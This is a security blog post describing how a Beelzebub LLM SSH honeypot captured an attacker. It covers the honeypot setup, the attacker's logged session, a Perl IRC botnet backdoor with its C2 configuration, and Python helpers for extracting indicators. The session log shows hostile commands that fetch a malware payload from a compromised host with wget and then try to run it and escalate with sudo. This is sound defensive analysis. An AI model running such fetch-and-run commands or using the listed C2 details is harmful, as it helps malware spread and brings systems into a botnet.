Introduction
In this article, I'll show how an LLM honeypot can trick a threat actor.
The threat actor, unaware of being in a honeypot, downloaded several binaries containing known exploits and finally attempted to execute a Perl script to connect the server to a botnet.
From the script's source code, I was able to retrieve the information needed to access the IRC channel used as its command and control server.
Honeypot configurations
The honeypot used for this analysis is Beelzebub, a low-code honeypot framework: an SSH LLM honeypot can be set up with a single configuration file. Below are the commands to download and configure it.
- Clone the Beelzebub examples repository:
$ git clone https://github.com/mariocandela/beelzebub-example.git
- Configure the LLM SSH honeypot: add your OpenAI key (openAISecretKey), or run it with a local llama model instead. The passwordRegex lists the passwords the honeypot accepts, so any login with one of them succeeds, and the single commands entry with regex "^(.+)$" routes every command the attacker types to the LLM plugin.
Edit the file at: configurations/services/ssh-2222.yaml
apiVersion: "v1"
protocol: "ssh"
address: ":2222"
description: "SSH LLM Honeypot"
commands:
  - regex: "^(.+)$"
    plugin: "LLMHoneypot"
serverVersion: "OpenSSH"
serverName: "ubuntu"
passwordRegex: "^(root|qwerty|Smoker666|123456|jenkins|minecraft|sinus|alex|postgres|Ly123456)$"
deadlineTimeoutSeconds: 120
plugin:
  llmModel: "gpt4-o"
  openAISecretKey: "sk-proj-1234567890"
- Execute using Docker:
$ docker compose up -d
- Show the logs:
$ docker logs --follow beelzebub
Analysis
The source IP address of the threat actor is 45.175.100.69; the username and password used were admin/123456.
Below are the commands executed by the threat actor and the responses generated by the LLM honeypot:
$ uname -a; uptime; nproc
Linux ubuntu 5.15.0-60-generic 66-Ubuntu SMP Mon Oct 10 16:30:08 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
16:22:01 up 1:24, 2 users, load average: 0.72, 0.65, 0.70
4
$ cd /tmp
$ wget http://deep-fm.de/tmp/files/sshd
--2023-10-14 16:23:45-- http://deep-fm.de/tmp/files/sshd
Resolving deep-fm.de (deep-fm.de)... 192.0.2.1
Connecting to deep-fm.de (deep-fm.de)|192.0.2.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 85647 (84K) [application/octet-stream]
Saving to: 'sshd'

sshd 100%[===================================================>] 83.64K --.-KB/s in 0.04s

2023-10-14 16:23:45 (2.08 MB/s) - 'sshd' saved [85647/85647]
$ perl sshd
bash: ./sshd: Permission denied
$ wget http://deep-fm.de/tmp/files/emech.tar.gz
--2023-10-14 16:25:10-- http://deep-fm.de/tmp/files/emech.tar.gz
Resolving deep-fm.de (deep-fm.de)... 192.0.2.1
Connecting to deep-fm.de (deep-fm.de)|192.0.2.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 102400 (100K) [application/x-gzip]
Saving to: 'emech.tar.gz'

emech.tar.gz 100%[===================================================>] 100.00K --.-KB/s in 0.03s

2023-10-14 16:25:10 (3.11 MB/s) - 'emech.tar.gz' saved [102400/102400]
$ tar zxvf emech.tar.gz
emech/
emech/install.sh
emech/README.md
emech/bin/
emech/bin/emech
emech/lib/
emech/lib/core.so
emech/doc/
emech/doc/manual.txt
$ ls
emech emech.tar.gz sshd
$ ls -a
. .. emech emech.tar.gz sshd
$ tar zxvf emech.tar.gz
emech/
emech/install.sh
emech/README.md
emech/bin/
emech/bin/emech
emech/lib/
emech/lib/core.so
emech/doc/
emech/doc/manual.txt
$ ls
emech emech.tar.gz sshd
$ tar xvf emech.tar.gz
emech/
emech/install.sh
emech/README.md
emech/bin/
emech/bin/emech
emech/lib/
emech/lib/core.so
emech/doc/
emech/doc/manual.txt
$ rm -rf emech.tar.gz emech
$ chmod +777 sshd
$ ls
sshd
$ perl sshd
Can't open perl script "sshd": Permission denied
$ cd /var/tmp
$ wget http://deep-fm.de/tmp/files/sshd
--2023-10-14 16:23:45-- http://deep-fm.de/tmp/files/sshd
Resolving deep-fm.de (deep-fm.de)... 192.0.2.1
Connecting to deep-fm.de (deep-fm.de)|192.0.2.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 85647 (84K) [application/octet-stream]
Saving to: 'sshd'

sshd 100%[===================================================>] 83.64K --.-KB/s in 0.04s
$ chmod +x sshd
$ perl sshd
Can't open perl script "sshd": Permission denied
$ sudo su
[sudo] password for user:
$ 123456
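A session like the one above is only useful to a responder once it is reduced to indicators: the commands typed, the hosts and URLs the payloads were fetched from, the files dropped and executed, and any credentials the attacker typed at a prompt. The following is an added example in Python that does this over a plain-text transcript; it is not part of the original post and not Beelzebub's own code, and the embedded transcript is a constructed sample in the shape of the session above (attacker input prefixed with "$ ", everything else honeypot output), not Beelzebub's JSON log format.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the shape of the honeypot session above: attacker
# input is prefixed with "$ ", everything else is the honeypot's output.
SAMPLE_SESSION = """\
$ uname -a; uptime; nproc
Linux ubuntu 5.15.0-60-generic 66-Ubuntu SMP x86_64 GNU/Linux
$ cd /tmp
$ wget http://deep-fm.de/tmp/files/sshd
--2023-10-14 16:23:45-- http://deep-fm.de/tmp/files/sshd
Saving to: 'sshd'
$ wget http://deep-fm.de/tmp/files/emech.tar.gz
$ tar zxvf emech.tar.gz
$ rm -rf emech.tar.gz emech
$ chmod +777 sshd
$ perl sshd
Can't open perl script "sshd": Permission denied
$ sudo su
[sudo] password for user:
$ 123456
"""

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
DOWNLOADERS = {"wget", "curl", "fetch"}
INTERPRETERS = {"perl", "python", "python3", "sh", "bash"}
# Output lines such as "[sudo] password for user:" or "Password:"
PASSWORD_PROMPT_RE = re.compile(r"password(\s+for\s+\S+)?\s*:\s*$", re.I)


def _add(seq, item):
    """Append without duplicates while keeping first-seen order."""
    if item and item not in seq:
        seq.append(item)


def extract_iocs(transcript):
    """Walk the transcript and collect what a responder wants first:
    the attacker's commands, the URLs and hosts they fetched from, the
    file names dropped, what they tried to run, and any credential
    typed in response to a password prompt."""
    iocs = {"commands": [], "urls": [], "hosts": [], "dropped_files": [],
            "executed": [], "credentials": []}
    prev_output = ""
    for line in transcript.splitlines():
        if not line.startswith("$ "):
            prev_output = line          # honeypot output, remembered for prompt detection
            continue
        cmd = line[2:].strip()
        prompt, prev_output = prev_output, ""
        iocs["commands"].append(cmd)
        # A bare line typed right after a password prompt is a password, not a command
        if PASSWORD_PROMPT_RE.search(prompt):
            iocs["credentials"].append(cmd)
            continue
        # Split compound commands such as "uname -a; uptime; nproc"
        for part in re.split(r"\s*(?:;|&&|\|\|)\s*", cmd):
            argv = part.split()
            if not argv:
                continue
            tool = argv[0]
            if tool in DOWNLOADERS:
                for url in URL_RE.findall(part):
                    _add(iocs["urls"], url)
                    _add(iocs["hosts"], urlparse(url).hostname)
                    _add(iocs["dropped_files"], url.rstrip("/").rsplit("/", 1)[-1])
            elif tool == "chmod":
                # Anything made executable is a candidate payload
                for path in argv[2:]:
                    _add(iocs["executed"], path)
            elif tool in INTERPRETERS and len(argv) > 1:
                _add(iocs["executed"], argv[1])
    return iocs


if __name__ == "__main__":
    for key, values in extract_iocs(SAMPLE_SESSION).items():
        print(f"{key}: {values}")
```

Run over the sample, it yields deep-fm.de as the staging host, sshd and emech.tar.gz as dropped files, sshd as the payload the attacker tried to execute, and 123456 as the password typed at the sudo prompt. Only attacker input is parsed; the honeypot's output (including the LLM's wget progress lines) is deliberately ignored so that hallucinated URLs or IPs in the generated responses never end up in the indicator list.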
I started analyzing the threat actor's behavior by checking the compromised site: http://deep-fm.de. The site is based on an old version of the Joomla CMS and exposes many services.
The threat actor had compromised this system and was using it as a staging server holding several exploits and botnet configuration scripts.
The first file downloaded by the threat actor is a Perl script named sshd (http://deep-fm.de/tmp/files/sshd). The script is a backdoor that allows the threat actor to connect to the infected server and execute commands or launch DoS attacks.
The backdoor uses an IRC channel as its command and control server.
Lines 78 to 89 of the Perl script contain the configuration of the IRC server and the channels used by the threat actor:
$server = 'ix1.undernet.org' unless $server;
my $port = '6667';
my $linas_max = '8';
my $sleep = '5';
my $homedir = "/tmp";
my $version = 'rootbox PerlBot v2.0';
my @admins = ("warlock`");
my @hostauth = ("terr0r.users.undernet.org");
my @channels = ("#rootbox", "#c0d3rs-TeaM");
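The C2 indicators in a bot like this (server, port, channels, admin nicks and the host mask it trusts) can be pulled out of the script statically, without running it. Here is an added example in Python that does so; it is not part of the original post and not the bot's or Beelzebub's code. The configuration block is embedded as a constructed sample with the values quoted above, and the regexes handle only literal quoted assignments, which covers this bot's settings but not arbitrary Perl.

```python
import re

# Constructed sample with the same shape (and the same values) as the
# configuration block quoted above from the bot's source.
BOT_CONFIG = r"""
$server = 'ix1.undernet.org' unless $server;
my $port = '6667';
my $linas_max = '8';
my $sleep = '5';
my $homedir = "/tmp";
my $version = 'rootbox PerlBot v2.0';
my @admins = ("warlock`");
my @hostauth = ("terr0r.users.undernet.org");
my @channels = ("#rootbox", "#c0d3rs-TeaM");
"""

# `my $name = 'value';` or `$name = "value" unless $name;`
SCALAR_RE = re.compile(
    r"""^\s*(?:my\s+)?\$(\w+)\s*=\s*(['"])(.*?)\2\s*(?:unless\s+\$\w+\s*)?;""", re.M)
# `my @name = ("a", "b");`
LIST_RE = re.compile(r"""^\s*(?:my\s+)?@(\w+)\s*=\s*\((.*?)\)\s*;""", re.M | re.S)
QUOTED_RE = re.compile(r"""(['"])(.*?)\1""")


def parse_perl_config(src):
    """Pull simple scalar and list assignments out of a Perl source blob.
    Only literal quoted values are handled, which is all this bot uses for
    its C2 settings; anything computed at run time is ignored."""
    scalars = {m.group(1): m.group(3) for m in SCALAR_RE.finditer(src)}
    lists = {m.group(1): [q.group(2) for q in QUOTED_RE.finditer(m.group(2))]
             for m in LIST_RE.finditer(src)}
    return scalars, lists


def c2_indicators(src):
    """Reduce the parsed config to the indicators a responder acts on:
    where the bot connects, which channels it joins, who it obeys, and
    the IRC JOIN lines to look for in network traffic."""
    scalars, lists = parse_perl_config(src)
    channels = lists.get("channels", [])
    return {
        "server": scalars.get("server"),
        "port": int(scalars.get("port", "6667")),
        "channels": channels,
        "admins": lists.get("admins", []),
        "hostauth": lists.get("hostauth", []),
        "version": scalars.get("version"),
        # A bot joining its channel sends "JOIN <channel>"; on plain-text
        # IRC (port 6667) that string is visible on the wire.
        "join_signatures": [f"JOIN {ch}" for ch in channels],
    }


if __name__ == "__main__":
    for key, value in c2_indicators(BOT_CONFIG).items():
        print(f"{key}: {value}")
```

The hostauth value is worth keeping alongside the channels: the bot only obeys commands from a nick whose host mask matches it, so it identifies the operator's Undernet account, and the channel names give both the abuse report to the network and the JOIN strings to alert on in egress traffic.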
I used this information to join the IRC channels #rootbox and #c0d3rs-TeaM; the following image shows the threat actor connected to #rootbox together with an infected server.
A simple way to neutralize a botnet of this kind is to take away its command and control server, which in this case means closing or banning the IRC channels. I reported the channels to the Undernet team.
Conclusion
This is the first of a series of articles about malware analysis and threat actor behavior.
The Beelzebub team is dedicated to making the internet a better and safer place.
If you want to help us with our work, please make a donation to the Beelzebub project or contribute to the code ❤️